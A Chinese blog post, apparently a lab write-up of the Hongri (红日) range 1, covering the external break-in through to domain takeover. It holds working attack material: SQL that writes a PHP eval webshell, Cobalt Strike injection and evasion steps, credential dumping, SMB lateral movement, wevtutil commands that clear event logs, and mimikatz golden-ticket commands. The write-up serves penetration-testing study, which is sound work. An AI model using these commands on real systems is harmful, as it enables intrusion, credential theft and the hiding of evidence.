<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084255319.png"
                      alt="image-20251113084255319"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084307165.png"
                      alt="image-20251113084307165"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084334788.png"
                      alt="image-20251113084334788"
                ></p>
<p>然后把vmnet1改成192.168.52.0&#x2F;24网段即可</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084512158.png"
                      alt="image-20251113084512158"
                ></p>
<p>在改完后点确定，然后我们开启我们的四台机子,在开启那三台靶机后，靶机会提示你密码过期了，你需要重新设置密码，那你就根据自己的爱好去设置密码即可，然后在登录进去后我们来查看三台靶机的IP</p>
<p>win7（web外网服务器）是会有2个不同网段的IP的，一个是外网的22网段，如果你的外网是别的网段也不必担心，因为这个是虚拟机自己设置的，不用管，只要ping得通靶机即可，然后另外一个52就是内网网段了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085021089.png"
                      alt="image-20251113085021089"
                ></p>
<p>其他两个靶机的IP</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084738201.png"
                      alt="image-20251113084738201"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113084701572.png"
                      alt="image-20251113084701572"
                ></p>
<p>接下来去互ping，如果通则正常，反之就出现问题了，尝试关闭防火墙和域防火墙后重新ping，如果不行则需要重新弄,接下来我们开启外网服务器,我们去到win7的小皮面板目录</p>
<p>注意:这里在开启后需要在重启win7一次，不然无法使用phpstudy</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085146743.png"
                      alt="image-20251113085146743"
                ></p>
<p>去访问127.0.0.1是否正常</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085232350.png"
                      alt="image-20251113085232350"
                ></p>
<p>攻击机（kali）去访问这个靶机的IP</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085253901.png"
                      alt="image-20251113085253901"
                ></p>
<h3 id="web外网突破"><a href="#web外网突破" class="headerlink" title="web外网突破"></a><strong>web外网突破</strong></h3><p>dirsearch目录扫描</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085409810.png"
                      alt="image-20251113085409810"
                ></p>
<p>访问phpmyadmin后台，root&#x2F;root 弱口令登录</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113085448399.png"
                      alt="image-20251113085448399"
                ></p>
<p>执行SQL语句</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113091014818.png"
                      alt="image-20251113091014818"
                ></p>
<div class="highlight-container" data-rel="Sql"><figure class="iseeu highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">读取文件：</span><br><span class="line">load_file(<span class="number">0x443a2f7777772e747874</span>)   D:<span class="operator">/</span>www.txt</span><br><span class="line"></span><br><span class="line">写入文件：<span class="keyword">into</span> outfile（），需要用户有写入文件的权限secure_file_priv的值不为<span class="keyword">NULL</span></span><br><span class="line">查看权限：<span class="keyword">show</span> <span class="keyword">global</span> variables <span class="keyword">like</span> <span class="string">&#x27;%secure%&#x27;</span>;</span><br><span class="line"><span class="keyword">select</span> &quot;&lt;?php eval($_POST[123]);?&gt;&quot; <span class="keyword">into</span> outfile &quot;/var/www/html/1.php&quot;</span><br><span class="line"><span class="keyword">select</span> &quot;&lt;?php eval($_POST[123]);?&gt;&quot; <span class="keyword">into</span> dumpfile &quot;D:\phpstudy_pro\WWW\testweb\1.php&quot;</span><br><span class="line"></span><br><span class="line">日志文件写入shell</span><br><span class="line">查看日志的位置和读写权限：<span class="keyword">show</span> variables <span class="keyword">like</span> <span class="string">&#x27;%general%&#x27;</span>;</span><br><span class="line">设置日志文件：<span class="keyword">set</span> <span class="keyword">global</span> general_log_file<span class="operator">=</span>&quot;C:\\phpStudy\\WWW\\shell.php&quot;</span><br><span class="line">开启读写权限：<span class="keyword">set</span> <span class="keyword">global</span> general_log<span class="operator">=</span>&quot;On&quot;</span><br><span class="line">将shell写入日志：<span class="keyword">SELECT</span> <span class="string">&#x27;&lt;?php eval($_POST[&quot;cmd&quot;])?&gt;&#x27;</span></span><br><span class="line">访问shell.php即可getshell</span><br></pre></td></tr></table></figure></div>

<p>蚁剑连接即可</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113091308954.png"
                      alt="image-20251113091308954"
                ></p>
<h3 id="内网攻击——CS上线"><a href="#内网攻击——CS上线" class="headerlink" title="内网攻击——CS上线"></a><strong>内网攻击——CS上线</strong></h3><p>关闭防火墙</p>
<div class="highlight-container" data-rel="Shell"><figure class="iseeu highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">windows：#关闭防火墙:netsh advfirewall set allprofiles state off;#查看防火墙状态:netsh advfirewall show allprofiles</span><br><span class="line"></span><br><span class="line">linux：sudo systemctl stop firewalld </span><br></pre></td></tr></table></figure></div>

<p>启动CS，生成木马上传，用蚁剑运行即可上线</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113091711185.png"
                      alt="image-20251113091711185"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113092726921.png"
                      alt="image-20251113092726921"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113092747646.png"
                      alt="image-20251113092747646"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113092805173.png"
                      alt="image-20251113092805173"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113092813299.png"
                      alt="image-20251113092813299"
                ></p>
<p>CS成功上线</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251119172350099.png"
                      alt="image-20251119172350099"
                ></p>
<p>但是如果木马文件被删了怎么办？所以我们要把这个程序迁移到别的系统程序上,我们先输入ps来查看每个程序的pid</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113093000357.png"
                      alt="image-20251113093000357"
                ></p>
<p>选择一个程序注入，输入inject 程序的pid，然后你在选择监听器</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">beacon&gt; inject [目标PID] [监听器名称] [技术选项]</span><br><span class="line"></span><br><span class="line">beacon&gt; ps                          # 列出进程</span><br><span class="line"> PID   Arch  Process</span><br><span class="line"> 1234  x64   explorer.exe           # 选择常见进程</span><br><span class="line"> 5678  x64   svchost.exe</span><br><span class="line"></span><br><span class="line">beacon&gt; inject 1234 http tcp        # 注入到 explorer.exe</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113093147160.png"
                      alt="image-20251113093147160"
                ></p>
<p>在注入完后可以发现多了一行Beacon交互，说明注入成功了，接下来我们使用kill来杀掉之前的(kill pid)，这样就不易被发现了,我们先输入ps来查看之前的进程pid</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113093248462.png"
                      alt="image-20251113093248462"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251113093312807.png"
                      alt="image-20251113093312807"
                ></p>
<blockquote>
<p>常见问题：</p>
<p><strong>权限不足</strong>：先提权 <code>getsystem</code> 或 <code>elevate</code></p>
<p><strong>架构不匹配</strong>：确保 x64 payload 注入 x64 进程（用 <code>ps</code> 检查 Arch 列）</p>
<p><strong>会话中断</strong>：改用 <code>spawn</code> 代替 <code>inject</code> 或检查杀软拦截</p>
</blockquote>
<h3 id="内网信息收集"><a href="#内网信息收集" class="headerlink" title="内网信息收集"></a>内网信息收集</h3><p><strong>一域二端三明文</strong></p>
<div class="highlight-container" data-rel="Css"><figure class="iseeu highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">net view                 # 查看局域网内其他主机名</span><br><span class="line">net config Workstation   # 查看计算机名、全名、用户名、系统版本、工作站、域、登录域</span><br><span class="line">net user                 # 查看本机用户列表</span><br><span class="line">net user /domain         # 查看域用户</span><br><span class="line">net localgroup administrators # 查看本地管理员组（通常会有域用户）</span><br><span class="line">net view /domain         # 查看有几个域</span><br><span class="line">net user 用户名 /domain   # 获取指定域用户的信息</span><br><span class="line">net group /domain        # 查看域里面的工作组，查看把用户分了多少组（只能在域控上操作）</span><br><span class="line">net group 组名 /domain    # 查看域中某工作组</span><br><span class="line">net group &quot;domain admins&quot; /domain  # 查看域管理员的名字</span><br><span class="line">net group &quot;domain computers&quot; /domain  # 查看域中的其他主机名</span><br><span class="line">net group &quot;doamin controllers&quot; /domain  # 查看域控制器主机名（可能有多台）</span><br><span class="line"></span><br><span class="line">定位域控</span><br><span class="line">net <span class="selector-tag">time</span> /domain         # 显示当前域的时间，结合ping命令定位域控 </span><br><span class="line">nltest /DCLIST:域名		# 查看域控机器名</span><br><span class="line">net group <span class="string">&quot;doamin controllers&quot;</span> /domain  # 查看域控制器主机名（可能有多台）</span><br></pre></td></tr></table></figure></div>

<p>先来看一下权限，如果权限是普通的admin权限的话我们使用<code>getsystem</code>来提升到<code>system权限</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251117095549117.png"
                      alt="image-20251117095549117"
                ></p>
<p>看一下局域网内的其他主机名</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251117095611002.png"
                      alt="image-20251117095611002"
                ></p>
<p>看一下这个主机的域是哪个后缀，也就是根域名</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092323996.png"
                      alt="image-20251118092323996"
                ></p>
<p>可以看到这个主机的域后缀是god.org，那我们在来看看它是哪个域的，有几个域</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092411444.png"
                      alt="image-20251118092411444"
                ></p>
<p>然后我们再看域主机名</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092517396.png"
                      alt="image-20251118092517396"
                ></p>
<p>可以看到域主机名为owa，那我们在加上域后缀来ping，即可找到哪台是我们的域控服务器</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092616331.png"
                      alt="image-20251118092616331"
                ></p>
<p>内网IP了，接下里我们要进行横向移动了</p>
<h3 id="横向移动-哈希码横向移动"><a href="#横向移动-哈希码横向移动" class="headerlink" title="横向移动&amp;哈希码横向移动"></a>横向移动&amp;哈希码横向移动</h3><blockquote>
<p>横向移动的本质是 <strong>“用高权限账号的密码，登录其他机器”</strong></p>
<p>因为<strong>域控制服务器</strong>以为都已经是内网才能访问了，不会被黑了，它就开了个<strong>共享目录</strong>在那里，但是文件存在域控制服务器上，这时候我们使用的<strong>cs会创建一个exe程序上传到域控制服务器</strong>，从而控制服务器，然后又因为域控制服务器肯定会有别的机子的密码的，所以只要控制域服务器后就完全掌控了整个域，其实也是域控制服务器曾经远程连接过这个机子，导致它的密码残留下来了，因为Windows 默认会在内存缓存登录凭证（即使注销后也可能残留）</p>
</blockquote>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118152625752.png"
                      alt="image-20251118152625752"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118152727262.png"
                      alt="image-20251118152727262"
                ></p>
<p>先扫描端口一下</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092912397.png"
                      alt="image-20251118092912397"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118092940731.png"
                      alt="image-20251118092940731"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093006391.png"
                      alt="image-20251118093006391"
                ></p>
<blockquote>
<p><strong>445端口</strong>是一个用于网络文件共享和打印机共享的端口，主要通过<strong>SMB协议（Server Message Block）</strong>实现。它允许用户在局域网中访问共享文件夹或打印机，而无需依赖传统的NetBIOS协议。</p>
</blockquote>
<p>可以看到开启了445的smb服务，那我们是用明文传输来上线机器，我们先创建一个smb的监听器</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093454273.png"
                      alt="image-20251118093454273"
                ></p>
<p>然后抓取明文密码，这里的Web服务器相当于<strong>“意外存储了域管密码的跳板”</strong></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093606967.png"
                      alt="image-20251118093606967"
                ></p>
<p>得到域管的账号密码</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093702786.png"
                      alt="image-20251118093702786"
                ></p>
<p>点击我们要横向移动的机器</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093739108.png"
                      alt="image-20251118093739108"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093800566.png"
                      alt="image-20251118093800566"
                ></p>
<p>选择刚刚的smb监听器</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093843544.png"
                      alt="image-20251118093843544"
                ></p>
<p>会话在选择我们的刚刚控制的web外网服务器</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118093914869.png"
                      alt="image-20251118093914869"
                ></p>
<p>然后点击运行，等待片刻便可看到域控服务器已经上线</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118094240059.png"
                      alt="image-20251118094240059"
                ></p>
<p>另一个机器也是如此，在弄完这些后别忘了清除痕迹</p>
<div class="highlight-container" data-rel="Css"><figure class="iseeu highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">shell wevtutil cl security    //清理安全日志</span><br><span class="line">shell wevtutil cl system        //清理系统日志</span><br><span class="line">shell wevtutil cl application        //清理应用程序日志</span><br><span class="line">shell wevtutil cl &quot;windows powershell&quot;    //清除power shell日志</span><br><span class="line">shell wevtutil cl Setup     //清除（cl）事件日志中的 &quot;Setup&quot; 事件。</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118094415153.png"
                      alt="image-20251118094415153"
                ></p>
<p>由此成功能控制整个域了，但是这还不够，我们来制作我们的黄金票据</p>
<h3 id="黄金票据"><a href="#黄金票据" class="headerlink" title="黄金票据"></a>黄金票据</h3><p>制作黄金票据需要四个东西</p>
<div class="highlight-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">#查看krbtgt值（黄金票据之一）</span><br><span class="line">hashdump</span><br><span class="line"></span><br><span class="line">#查看sid（黄金票据之一）</span><br><span class="line">shell whoami /all</span><br><span class="line"></span><br><span class="line">#查看域名（黄金票据之一）</span><br><span class="line">shell ipconfig /all</span><br><span class="line"></span><br><span class="line">#查看用户名（黄金票据之一)</span><br><span class="line">net user</span><br><span class="line"></span><br><span class="line">#切换到C盘创建</span><br><span class="line">cd C:\</span><br></pre></td></tr></table></figure></div>

<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251123221407447.png"
                      alt="image-20251123221407447"
                ></p>
<blockquote>
<p><strong>黄金票据就是当你被下线后，而你此时成功掌控了一个可访问内网电脑，你就可以上传这个票据，在使用命令使用，你就可以恢复你域掌控者的身份了</strong></p>
<p>生成票据：</p>
<p><code>mimikatz Kerberos::golden /user:XXX /domain:xxxxx /sid:xxxxx… /krbtgt:krbtgt的hash值 /ticket:ticket.kirbi</code></p>
<p>kerberos::golden &#x2F;user:administrator &#x2F;domain:cyber.com &#x2F;sid:S-1-5-21-1923088019-4105411894-1236499359 &#x2F;krbtgt:d40f0e3b1347e55dbfd6dc58e80a3b6e &#x2F;ticket:ticket.kirbi </p>
<p><code>kerberos::golden /user:XXX任意用户名 /domain:域名 /sid:域的sid值 /ticket:XXX.kirbi(生成的票据名称)</code></p>
<p>票据传递：</p>
<p>kerberos::ptt ticket.kirbi </p>
<p>dir \dc.cyber.com\c$ 	#这里好像一定要完整的主机名才行</p>
</blockquote>
<p>先点击抓取明文，主要是为了看用户</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151027895.png"
                      alt="image-20251118151027895"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151057342.png"
                      alt="image-20251118151057342"
                ></p>
<p>接下来我们来看域</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151118171.png"
                      alt="image-20251118151118171"
                ></p>
<p>再来弄sid</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151159740.png"
                      alt="image-20251118151159740"
                ></p>
<p>最后我们在点击获取krbtgt哈希值，即可去创建我们的黄金票据了</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151236598.png"
                      alt="image-20251118151236598"
                ></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118181219292.png"
                      alt="image-20251118181219292"
                ></p>
<p>然后我们制作黄金票据</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151316259.png"
                      alt="image-20251118151316259"
                ></p>
<p>然后按照下面图片的参考来弄</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151420485.png"
                      alt="image-20251118151420485"
                ></p>
<p>最后点击生成等待片刻，成功生成后是下面这个样子</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151615299.png"
                      alt="image-20251118151615299"
                ></p>
<p><code>run klist</code>验证一下</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151644926.png"
                      alt="image-20251118151644926"
                ></p>
<p>当然了，光生成没有用，我们得创建，然后下载下来,我们先切换位置在生成文件</p>
<p>这里切换到的是C:\位置，然后我们生成黄金票据<code>mimikatz kerberos::list /export</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151818580.png"
                      alt="image-20251118151818580"
                ></p>
<p>可以看到我们已经成功生成了</p>
<blockquote>
<p><code>0-6oaooooo-Administrator@krbtgt-GoD.ORG-GoD.ORG.kirbi</code></p>
<p><code>1-40eooooo-Administrator@krbtgt-GoD.ORG-GoD.ORG.kirbi</code></p>
</blockquote>
<p>接下里我们来查看一下是否生成成功，或者是否能够查看到<code>shell dir C:\*.kirbi</code></p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118151941717.png"
                      alt="image-20251118151941717"
                ></p>
<p>把他们下载下来</p>
<p><code>download 0-6oaooooo-Administrator@krbtgt-GoD.ORG-GoD.ORG.kirbi</code></p>
<p>通常下载后的默认文件夹是server&#x2F;download的文件夹，也就是cs文件夹里面的server文件夹</p>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/../images/image-20251118152033796.png"
                      alt="image-20251118152033796"
                ></p>

        </div>

        
            <div class="post-copyright-info w-full my-8 px-2 sm:px-6 md:px-8">
                <div class="article-copyright-info-container">
    <ul>
        <li><strong>Title:</strong> 内网安全 专题</li>
        <li><strong>Author:</strong> xiaolaisec</li>
        <li><strong>Created at
                :</strong> 2025-11-04 09:35:22</li>
        
            <li>
                <strong>Updated at
                    :</strong> 2025-11-27 09:06:36
            </li>
        
        <li>
            <strong>Link:</strong> https://redefine.ohevan.com/2025/11/04/内网安全-专题/
        </li>
        <li>
            <strong>
                License:
            </strong>
            

            
                This work is licensed under <a class="license" target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0">CC BY-NC-SA 4.0</a>.
            
        </li>
    </ul>
</div>

            </div>
        

        
            <ul class="post-tags-box text-lg mt-1.5 flex-wrap justify-center flex md:hidden">
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/CS/">#CS</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/MSF/">#MSF</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/TGT-ST/">#TGT&amp;ST</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8/">#横向移动</a>&nbsp;
                    </li>
                
                    <li class="tag-item mx-0.5">
                        <a href="/tags/Kerberos/">#Kerberos</a>&nbsp;
                    </li>
                
            </ul>
        

        

        
            <div class="article-nav my-8 flex justify-between items-center px-2 sm:px-6 md:px-8">
                
                    <div class="article-prev border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="prev"
                        rel="prev"
                        href="/2025/11/04/AWDP-%E4%B8%93%E9%A2%98/"
                        >
                            <span class="left arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-left"></i>
                            </span>
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">AWDP 专题</span>
                                <span class="post-nav-item">Prev posts</span>
                            </span>
                        </a>
                    </div>
                
                
                    <div class="article-next border-border-color shadow-redefine-flat shadow-shadow-color-2 rounded-medium px-4 py-2 hover:shadow-redefine-flat-hover hover:shadow-shadow-color-2">
                        <a class="next"
                        rel="next"
                        href="/2025/11/04/DASCTF%202025%E4%B8%8B%E5%8D%8A%E5%B9%B4%E8%B5%9BWP/"
                        >
                            <span class="title flex justify-center items-center">
                                <span class="post-nav-title-item">DASCTF 2025下半年赛 WP</span>
                                <span class="post-nav-item">Next posts</span>
                            </span>
                            <span class="right arrow-icon flex justify-center items-center">
                                <i class="fa-solid fa-chevron-right"></i>
                            </span>
                        </a>
                    </div>
                
            </div>
        


        
            <div class="comment-container px-2 sm:px-6 md:px-8 pb-8">
                <div class="comments-container mt-10 w-full ">
    <div id="comment-anchor" class="w-full h-2.5"></div>
    <div class="comment-area-title w-full my-1.5 md:my-2.5 text-xl md:text-3xl font-bold">
        Comments
    </div>
    

        
            
    <div id="waline"></div>
    <script type="module" data-swup-reload-script>
      import { init } from '/js/libs/waline.mjs';

      function loadWaline() {
        init({
          el: '#waline',
          serverURL: 'https://example.example.com',
          lang: 'zh-CN',
          dark: 'body[class~="dark-mode"]',
          requiredMeta: ['nick', 'mail'],
          emoji: [],
          
          
        });
      }

      if (typeof swup !== 'undefined') {
        loadWaline();
      } else {
        window.addEventListener('DOMContentLoaded', loadWaline);
      }
    </script>



        
    
</div>

            </div>
        
    </div>

    
        <div class="toc-content-container">
            <div class="post-toc-wrap">
    <div class="post-toc">
        <div class="toc-title">On this page</div>
        <div class="page-title">内网安全 专题</div>
        <ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%B8%80%E7%AB%A0-%E5%86%85%E7%BD%91%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-text">第一章 内网基础知识</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%BA%8C%E7%AB%A0-%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90"><span class="nav-text">第二章 用户权限</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%AC%AC%E4%B8%89%E7%AB%A0Windows%E8%AE%A4%E8%AF%81%E6%9C%BA%E5%88%B6%E5%92%8C%E5%8D%8F%E8%AE%AE-%E9%87%8D%E8%A6%81"><span class="nav-text">第三章Windows认证机制和协议(重要)</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%9C%AC%E5%9C%B0%E8%AE%A4%E8%AF%81"><span class="nav-text">本地认证</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E6%9C%AC%E5%9C%B0%E8%AE%A4%E8%AF%81%E6%A6%82%E8%BF%B0"><span class="nav-text">(1)本地认证概述</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-SAM%E6%96%87%E4%BB%B6%E5%92%8Clsass%E8%BF%9B%E7%A8%8B"><span class="nav-text">(2)SAM文件和lsass进程</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#4-%E6%9C%AC%E5%9C%B0%E8%AE%A4%E8%AF%81%E4%B8%AD%E7%9A%84%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98"><span class="nav-text">(4)本地认证中的安全问题</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%BD%91%E7%BB%9C%E8%AE%A4%E8%AF%81"><span class="nav-text">网络认证</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-%E7%BD%91%E7%BB%9C%E8%AE%A4%E8%AF%81%E6%A6%82%E8%BF%B0%E5%92%8C%E4%BB%8B%E7%BB%8D"><span class="nav-text">1.网络认证概述和介绍</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#6-NTLM%E5%8D%8F%E8%AE%AE%E5%AE%89%E5%85%A8%E9%97%AE%E9%A2%98"><span class="nav-text">6.NTLM协议安全问题</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%9F%9FKerberos%E8%AE%A4%E8%AF%81"><span class="nav-text">域Kerberos认证</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-Kerberos%E5%8D%8F%E8%AE%AE%E7%AE%80%E4%BB%8B"><span class="nav-text">1.Kerberos协议简介</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BA%A2%E6%97%A5%E9%9D%B6%E5%9C%BA%E6%90%AD%E5%BB%BA%E4%B8%8E%E5%A4%8D%E7%8E%B0"><span class="nav-text">红日靶场搭建与复现</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E9%9D%B6%E5%9C%BA1"><span class="nav-text">靶场1</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%90%AD%E5%BB%BA"><span class="nav-text">搭建</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#web%E5%A4%96%E7%BD%91%E7%AA%81%E7%A0%B4"><span class="nav-text">web外网突破</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E6%94%BB%E5%87%BB%E2%80%94%E2%80%94CS%E4%B8%8A%E7%BA%BF"><span class="nav-text">内网攻击——CS上线</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%86%85%E7%BD%91%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86"><span class="nav-text">内网信息收集</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8-%E5%93%88%E5%B8%8C%E7%A0%81%E6%A8%AA%E5%90%91%E7%A7%BB%E5%8A%A8"><span class="nav-text">横向移动&amp;哈希码横向移动</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E9%BB%84%E9%87%91%E7%A5%A8%E6%8D%AE"><span class="nav-text">黄金票据</span></a></li></ol></li></ol></li></ol>

    </div>
</div>
        </div>
    
</div>



                

            </div>

            

        </div>

        <div class="main-content-footer">
            <footer class="footer mt-5 py-5 h-auto text-base text-third-text-color relative border-t-2 border-t-border-color">
    <div class="info-container py-3 text-center">
        
        <div class="text-center">
            &copy;
            
              <span>2022</span>
              -
            
            2026&nbsp;&nbsp;<i class="fa-solid fa-heart fa-beat" style="--fa-animation-duration: 0.5s; color: #f54545"></i>&nbsp;&nbsp;<a href="/">xiaolaisec</a>
        </div>
        
            <script data-swup-reload-script src="https://cn.vercount.one/js"></script>
            <div class="relative text-center lg:absolute lg:right-[20px] lg:top-1/2 lg:-translate-y-1/2 lg:text-right">
                
